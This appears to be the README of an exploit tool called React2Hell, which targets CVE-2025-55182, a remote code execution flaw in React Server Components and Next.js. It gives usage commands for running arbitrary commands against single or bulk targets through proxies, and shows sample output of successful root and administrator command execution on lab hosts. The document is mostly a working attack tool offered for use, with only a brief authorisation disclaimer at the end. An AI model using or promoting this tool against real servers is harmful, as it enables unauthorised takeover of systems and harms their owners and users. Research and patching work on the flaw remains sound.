🔥 Next.js / React Server Remote Code Execution (RCE) Exploit
█████▄ ▄▄▄▄▄ ▄▄▄ ▄▄▄▄ ▄▄▄▄▄▄ ████▄ ██ ██ ▄▄▄▄▄ ▄▄ ▄▄
██▄▄██▄ ██▄▄ ██▀██ ██▀▀▀ ██ ▄██▀ ██████ ██▄▄ ██ ██
██ ██ ██▄▄▄ ██▀██ ▀████ ██ ███▄▄ ██ ██ ██▄▄▄ ██▄▄▄ ██▄▄▄
Next.js/React Server RCE Exploit — CVE-2025-55182
Author: Chetanya Sharma (AggressiveUser)
════════════════════════════════════════════════════════════════════════
usage: new.py [-h] [-u URL] [-l LIST] -c COMMAND [--proxy PROXY] [--proxy-https PROXY_HTTPS]
React2Hell is a powerful exploitation tool designed to test and exploit CVE-2025-55182, a critical Remote Code Execution vulnerability affecting Next.js & React Server Actions.
A pre-authentication remote code execution vulnerability exists in React Server Components versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0 including the following packages: react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack. The vulnerable code unsafely deserializes payloads from HTTP requests to Server Function endpoints.
- 🧨 Remote Code Execution (RCE)
- 🌐 Single URL / Bulk URL scanning
- 🧩 Custom command execution
- 🕵️♂️ Stealth mode with proxy support
- ⚡ Fast, reliable, and easy to use
python exploit.py -u https://target.com -c "whoami"
python exploit.py -l urls.txt -c "whoami"
python exploit.py -u https://target.com -c "whoami" --proxy 127.0.0.1:8080
python exploit.py -u https://target.com -c "whoami" --proxy-https 127.0.0.1:8080
http://site1.com
https://site2.com
http://192.168.1.10:3000
PS D:\AggressiveUser_PVT\React2Hell> python.exe .\exploit.py -l .\list.txt -c whoami
█████▄ ▄▄▄▄▄ ▄▄▄ ▄▄▄▄ ▄▄▄▄▄▄ ████▄ ██ ██ ▄▄▄▄▄ ▄▄ ▄▄
██▄▄██▄ ██▄▄ ██▀██ ██▀▀▀ ██ ▄██▀ ██████ ██▄▄ ██ ██
██ ██ ██▄▄▄ ██▀██ ▀████ ██ ███▄▄ ██ ██ ██▄▄▄ ██▄▄▄ ██▄▄▄
Next.js/React Server RCE Exploit — CVE-2025-55182
Author: Chetanya Sharma (AggressiveUser)
════════════════════════════════════════════════════════════════════════
[+] Loaded 3 targets
════════════════════════════════════════════════════════════════════════
[→] Target: http://meow.host:3113/
[→] Exec: whoami
[✓] VULNERABLE — RCE Successful!
------------------------------------------------------------
root
------------------------------------------------------------
────────────────────────────────────────────────────────────────────────
[→] Target: http://evil.lab:2000/
[→] Exec: whoami
[✗] Not vulnerable — Status: 200
────────────────────────────────────────────────────────────────────────
[→] Target: https://vul.lab:3000/
[→] Exec: whoami
[✓] VULNERABLE — RCE Successful!
------------------------------------------------------------
win-1fl835ovldc\\administrator
------------------------------------------------------------
────────────────────────────────────────────────────────────────────────
[✓] Scan complete — Vulnerable: 2
PS D:\AggressiveUser_PVT\React2Hell>
This tool is created strictly for educational & security research purposes. Do NOT use it on systems without explicit authorization. You are responsible for your own actions.
If this exploit helped you, consider leaving a ⭐ on GitHub ❤️
Chetanya Sharma AggressiveUser
Made with 🔥 by someone who enjoys breaking & fixing things.